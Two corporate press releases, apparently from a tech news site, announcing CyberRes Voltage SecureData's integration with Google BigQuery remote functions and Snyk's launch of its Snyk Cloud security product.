CyberRes, a Micro Focus line of business, today announced a partnership with Google Cloud to support the upcoming release of BigQuery remote functions. The partnership will see CyberRes' end-to-end enterprise data protection solution, Voltage SecureData, integrate with Google's BigQuery data warehouse to accelerate and expand organizations' data science initiatives and help companies comply with ever-evolving privacy regulations. The integration will enable CyberRes Voltage customers to persistently protect data in use, in motion, and at rest in Google BigQuery. The support for remote functions also enables Google Cloud's BigQuery customers to take advantage of Voltage's privacy-enabling technologies. Mutual customers can use Voltage's format-preserving encryption, hashing, and tokenization services within BigQuery in conjunction with Google BigQuery's native security to address strict privacy compliance controls. Voltage's cloud-agnostic and consistent data protection allows all customers to safely use regulated data for analytics across hybrid clouds. "The availability of remote functions from BigQuery is an exciting and critical evolution of Google Cloud's platform for our customers," said Tony de la Lama, Vice President of Product Management, CyberRes. "The integration with Voltage SecureData means BigQuery will allow customers to utilize and support the Voltage data-centric protection approach for secure analytics, enabling enterprises to accelerate and expand their data science initiatives with privacy by default." BigQuery, Google Cloud's highly scalable multi-cloud data warehouse, is designed for business agility and allows customers to gain insights with real-time and predictive analytics, access data and securely share insights with ease. This new partnership adds to Voltage SecureData's deep capabilities in securing analytics across data warehouses, databases and data lakes and enables customers to shift workloads seamlessly and securely to BigQuery. "Emerging threats and evolving technology needs are at the forefront of challenges in cyber security. By making its Voltage SecureData solution available to Google Cloud customers from within their BigQuery data warehouse, CyberRes is enabling customers with the technologies needed to protect their sensitive data while addressing and adhering to current data privacy regulations," Ritika Suri, Director, Technology Partnerships, Google Cloud The CyberRes Voltage portfolio helps secure organizations with continuous data discovery, insight, and protection to reduce risk and enable privacy by design. Organizations can work with high-value, sensitive customer data in its protected state to derive business intelligence without the risk of data exposure in Google BigQuery. The data protection technologies in Voltage SecureData provide flexible implementation and data-centric protection for a virtually unlimited number of structured data types in any language, and in any region, with proven performance, reliability, and scalability. About CyberRes CyberRes is a Micro Focus line of business. We bring the expertise of one of the world's largest security portfolios to help our customers navigate the changing threat landscape by building both cyber and business resiliency within their teams and organizations. CyberRes is part of a larger set of digital transformation solutions that fight adverse conditions so businesses can continue to run today, keep the lights on, and transform to grow and take advantage of tomorrow's opportunities.

Read More

CLOUD APP DEVELOPMENT

Snyk Unveils Snyk Cloud, the Industry's First Developer-Centric Cloud Security Solution

Snyk | July 27, 2022

Snyk, the leader in developer security, today unveiled Snyk Cloud, announcing the launch of the industry's first comprehensive Cloud Security Solution designed by and for developers. This latest development was made possible by the acquisition of Fugue earlier this year. Thoughtfully designed with global DevSecOps teams in mind, Snyk’s Cloud Security solution unites and extends existing products Snyk Infrastructure as Code and Snyk Container with Fugue’s leading cloud security posture management (CSPM) capabilities. These elements are now powerfully combined to realize a fully featured cloud security solution that allows today’s modern developers to continue their rapid pace of innovation securely. The Snyk Cloud product extends the company’s existing Developer Security Platform in a significant way, allowing more companies to embrace DevSecOps and spark further effective collaboration between their developer, operations, security and compliance teams. Instead of grappling to patch together multiple, incompatible cloud and application security solutions, ultimately leading to a fragmented view of application security in the cloud, global developers now have the ability to take full ownership of their infrastructure. At the same time, their security counterparts can define and operate a consistent cloud security posture across the entire software development lifecycle (SDLC). With the digital era’s ever rising need for innovation speed, siloed application and cloud security tools that focus on detecting issues after deployment are too slow and risky, creating growing tension between developer and security teams. With the addition of Snyk Cloud, Snyk customers will now be the first to benefit from a unified platform and policy engine that equips them to create secure deployments via an unmatched feedback loop – from code to cloud and back to code – securing their cloud before deployment and maintaining its secure integrity while running as well as then assessing and prioritizing the precise places to provide fixes back in the code. In fact, over the past year, Snyk customers have reported that they improve their security risk posture by more than 60% by reducing the time it takes to find and fix vulnerabilities. “Snyk’s developer-first approach disrupted the application security industry and we’re now aiming to apply many of those lessons learned to the fastest growing segment of cybersecurity today: cloud security, Predicted to be worth $77.5 billion by 20261, this is an area ripe for change. Today’s news represents another important milestone for the developer security movement, and we look forward to the industry’s response to our vision of uniting AppSec and CloudSec teams to secure today’s apps more efficiently.” Peter McKay, CEO, Snyk “Our global customers have witnessed firsthand how previous cybersecurity tenets have evolved profoundly, with cloud infrastructure now changing just as fast as the apps themselves. They’re eager for one comprehensive solution that provides a truly complete cloud picture, driving DevSecOps by enhancing developer productivity securely,” said Adi Sharabani, CTO, Snyk. “We’re incredibly proud to reveal this industry gamechanger, Snyk Cloud, the first developer security product designed for the cloud era in order to address every important stage of a modern app’s life today from development through to production.” Now Powered by Snyk: The Cloud Security Podcast In timing with AWS re:Inforce, Snyk has introduced two exciting new cloud security hires, Ashish Rajan and Shilpi Bhattacharjee, founders of the Cloud Security Podcast, which is now officially powered by Snyk. In their new roles, Ashish will be Snyk’s first Cloud Security Advocate, while Shilpi will continue to serve as Lead Program Manager for the Cloud Security Podcast. As with the Secure Developer Podcast and DevSecCon, Snyk is committed to continuing to build these global communities that foster education, thought leadership and promote secure development. Please visit here to read more about what’s ahead for Ashish, Shilpi and the incredible cloud security community that they have fostered over the last several years. Snyk is a Diamond sponsor at AWS re:Inforce, a learning conference focused on security, compliance, identity and privacy taking place in Boston, July 26-27, 2022. Snyk Cloud is currently available on a limited basis with general availability planned in the Fall 2022. To see Snyk Cloud in action, visit the company’s booth (#408) or sign up for a demo here. About Snyk Snyk is the leader in developer security. We empower the world’s developers to build secure applications and equip security teams to meet the demands of the digital world. Our developer-first approach ensures organizations can secure all of the critical components of their applications from code to cloud, leading to increased developer productivity, revenue growth, customer satisfaction, cost savings and an overall improved security posture. Snyk’s Developer Security Platform automatically integrates with a developer’s workflow and is purpose-built for security teams to collaborate with their development teams. Snyk is used by 2,000+ customers worldwide today, including industry leaders such as Asurion, Google, Intuit, MongoDB, New Relic, Revolut and Salesforce.

Read More

Events